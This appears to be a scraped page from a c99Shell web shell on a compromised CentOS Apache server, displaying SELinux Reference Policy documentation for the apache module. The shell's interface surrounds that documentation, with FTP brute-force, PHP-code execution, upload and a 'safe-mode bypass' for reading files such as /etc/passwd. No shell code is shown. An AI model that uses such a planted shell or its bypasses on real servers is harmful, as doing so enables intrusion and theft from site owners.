!c99Shell v. 1.0 pre-release build #16!

Software: Apache/2.2.3 (CentOS). PHP/5.1.6 

uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44
EDT 2010 i686
 

uid=48(apache) gid=48(apache) groups=48(apache) 

Safe-mode: OFF (not secure)

/usr/share/doc/selinux-policy-2.4.6/html/   drwxr-xr-x
Free 50.94 GB of 127.8 GB (39.85%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     services_apache.html (38.08 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
Security Enhanced Linux Reference Policy

Layer: services

Module: apache

Interfaces Templates

Description:

Apache web server

Interfaces:

apache_admin( prefix , domain , role )
Summary

All of the rules required to administrate an apache environment

Parameters
Parameter:Description:Optional:
prefix

Prefix of the domain. Example, user would be the prefix for the uder_t domain.

No
domain

Domain allowed access.

No
role

The role to be allowed to manage the apache domain.

No
apache_append_log( domain )
Summary

Allow the specified domain to append to apache log files.

Parameters
Parameter:Description:Optional:
domain

Domain allowed access.

No
apache_append_squirrelmail_data( domain )
Summary

Allow the specified domain to append apache squirrelmail data.

Parameters
Parameter:Description:Optional:
domain

Domain allowed access.

No
apache_domtrans( domain )
Summary

Transition to apache.

Parameters
Parameter:Description:Optional:
domain

Domain allowed access.

No
apache_domtrans_all_scripts( domain )
Summary

Execute all user scripts in the user script domain.

Parameters
Parameter:Description:Optional:
domain

Domain allowed access.

No
apache_domtrans_helper( domain )
Summary

Execute the Apache helper program with a domain transition.

Parameters
Parameter:Description:Optional:
domain

Domain allowed access.

No
apache_domtrans_rotatelogs( domain )
Summary

Execute a domain transition to run httpd_rotatelogs.

Parameters
Parameter:Description:Optional:
domain

Domain allowed access.

No
apache_domtrans_sys_script( domain )
Summary

Execute all web scripts in the system script domain.

Parameters
Parameter:Description:Optional:
domain

Domain allowed access.

No
apache_dontaudit_append_log( domain )
Summary

Do not audit attempts to append to the Apache logs.

Parameters
Parameter:Description:Optional:
domain

Domain to not audit.

No
apache_dontaudit_read_state( domain )
Summary

Parameters
Parameter:Description:Optional:
domain

Domain to not audit.

No
apache_dontaudit_rw_bugzilla_script_stream_sockets( domain )
Summary

Do not audit attempts to read and write Apache bugzill script unix domain stream sockets.

Parameters
Parameter:Description:Optional:
domain

Domain allowed access.

No
apache_dontaudit_rw_stream_sockets( domain )
Summary

Do not audit attempts to read and write Apache unix domain stream sockets.

Parameters
Parameter:Description:Optional:
domain

Domain allowed access.

No
apache_dontaudit_rw_sys_script_stream_sockets( domain )
Summary

Do not audit attempts to read and write Apache system script unix domain stream sockets.

Parameters
Parameter:Description:Optional:
domain

Domain allowed access.

No
apache_dontaudit_rw_tcp_sockets( domain )
Summary

Do not audit attempts to read and write Apache TCP sockets.

Parameters
Parameter:Description:Optional:
domain

Domain allowed access.

No
apache_dontaudit_search_modules( domain )
Summary

Do not audit attempts to search Apache module directories.

Parameters
Parameter:Description:Optional:
domain

Domain to not audit.

No
apache_exec_modules( domain )
Summary

Allow the specified domain to execute apache modules.

Parameters
Parameter:Description:Optional:
domain

Domain allowed access.

No
apache_getattr( domain )
Summary

getattr apache.process

Parameters
Parameter:Description:Optional:
domain

Domain allowed access.

No
apache_list_modules( domain )
Summary

Allow the specified domain to list the contents of the apache modules directory.

Parameters
Parameter:Description:Optional:
domain

Domain allowed access.

No
apache_manage_all_content( domain )
Summary

Create, read, write, and delete all web content.

Parameters
Parameter:Description:Optional:
domain

Domain allowed access.

No
apache_manage_config( domain )
Summary

Allow the specified domain to manage apache configuration files.

Parameters
Parameter:Description:Optional:
domain

Domain allowed access.

No
apache_manage_lock( domain )
Summary

Allow the specified domain to create apache lock file

Parameters
Parameter:Description:Optional:
domain

Domain allowed access.

No
apache_manage_log( domain )
Summary

Allow the specified domain to manage to apache log files.

Parameters
Parameter:Description:Optional:
domain

Domain allowed access.

No
apache_manage_modules( domain )
Summary

Allow the specified domain to manage apache modules.

Parameters
Parameter:Description:Optional:
domain

Domain allowed access.

No
apache_manage_pid( domain )
Summary

Allow the specified domain to manage apache pid file

Parameters
Parameter:Description:Optional:
domain

Domain allowed access.

No
apache_manage_sys_content( domain )
Summary

Allow the specified domain to manage apache system content files.

Parameters
Parameter:Description:Optional:
domain

Domain allowed access.

No
apache_read_config( domain )
Summary

Allow the specified domain to read apache configuration files.

Parameters
Parameter:Description:Optional:
domain

Domain allowed access.

No
apache_read_log( domain )
Summary

Allow the specified domain to read apache log files.

Parameters
Parameter:Description:Optional:
domain

Domain allowed access.

No
apache_read_squirrelmail_data( domain )
Summary

Allow the specified domain to read apache squirrelmail data.

Parameters
Parameter:Description:Optional:
domain

Domain allowed access.

No
apache_read_state( domain )
Summary

Parameters
Parameter:Description:Optional:
domain

Domain allowed access.

No
apache_read_sys_content( domain )
Summary

Read apache system content.

Parameters
Parameter:Description:Optional:
domain

Domain to not audit.

No
apache_relabel( domain )
Summary

allow domain to relabel apache content

Parameters
Parameter:Description:Optional:
domain

Domain to not audit.

No
apache_run_all_scripts( domain , role )
Summary

Execute all user scripts in the user script domain. Add user script domains to the specified role.

Parameters
Parameter:Description:Optional:
domain

Domain allowed access.

No
role

The role to be allowed the script domains.

No
apache_run_helper( domain , role , terminal )
Summary

Execute the Apache helper program with a domain transition, and allow the specified role the dmidecode domain.

Parameters
Parameter:Description:Optional:
domain

Domain allowed access.

No
role

The role to be allowed the dmidecode domain.

No
terminal

The type of the terminal allow the dmidecode domain to use.

No
apache_rw_cache_files( domain )
Summary

Allow the specified domain to read and write Apache cache files.

Parameters
Parameter:Description:Optional:
domain

Domain allowed access.

No
apache_script_domtrans( domain )
Summary

Execute apache server in the ntpd domain.

Parameters
Parameter:Description:Optional:
domain

The type of the process performing this action.

No
apache_search_bugzilla_dirs( domain )
Summary

Allow the specified domain to search apache bugzilla directories.

Parameters
Parameter:Description:Optional:
domain

Domain allowed access.

No
apache_search_sys_content( domain )
Summary

Search apache system content.

Parameters
Parameter:Description:Optional:
domain

Domain allowed access.

No
apache_search_sys_script_state( domain )
Summary

Search system script state directory.

Parameters
Parameter:Description:Optional:
domain

Domain to not audit.

No
apache_sigchld( domain )
Summary

Send a SIGCHLD signal to apache.

Parameters
Parameter:Description:Optional:
domain

Domain allowed access.

No
apache_signal( domain )
Summary

Send a signal to apache.

Parameters
Parameter:Description:Optional:
domain

Domain allowed access.

No
apache_signull( domain )
Summary

Send a null signal to apache.

Parameters
Parameter:Description:Optional:
domain

Domain allowed access.

No
apache_use_fds( domain )
Summary

Inherit and use file descriptors from Apache.

Parameters
Parameter:Description:Optional:
domain

Domain allowed access.

No
Return

Templates:

apache_content_template( prefix )
Summary

Create a set of derived types for apache web content.

Parameters
Parameter:Description:Optional:
prefix

The prefix to be used for deriving type names.

No
apache_per_role_template( userdomain_prefix , user_domain , user_role )
Summary

The per role template for the apache module.

Description

This template creates types used for web pages and web cgi to be used from the user home directory.

This template is invoked automatically for each user, and generally does not need to be invoked directly by policy writers.

Parameters
Parameter:Description:Optional:
userdomain_prefix

The prefix of the user domain (e.g., user is the prefix for user_t).

No
user_domain

The type of the user domain.

No
user_role

The role associated with the user domain.

No
apache_read_user_content( domain_prefix , domain )
Summary

Read user web content.

Parameters
Parameter:Description:Optional:
domain_prefix

Prefix of the domain. Example, user would be the prefix for the uder_t domain.

No
domain

Domain allowed access.

No
apache_read_user_scripts( domain_prefix , domain )
Summary

Read httpd user scripts executables.

Parameters
Parameter:Description:Optional:
domain_prefix

Prefix of the domain. Example, user would be the prefix for the uder_t domain.

No
domain

Domain allowed access.

No
Return

:: Command execute ::

Enter:
 
Select:
 

:: Shadow's tricks :D ::

Useful Commands
 
Warning. Kernel may be alerted using higher levels
Kernel Info:

:: Preddy's tricks :D ::

Php Safe-Mode Bypass (Read Files)

File:

eg: /etc/passwd

Php Safe-Mode Bypass (List Directories):

Dir:

eg: /etc/

:: Search ::
  - regexp 

:: Upload ::
 
[ Read-Only ]

:: Make Dir ::
 
[ Read-Only ]
:: Make File ::
 
[ Read-Only ]

:: Go Dir ::
 
:: Go File ::
 

--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.0104 ]--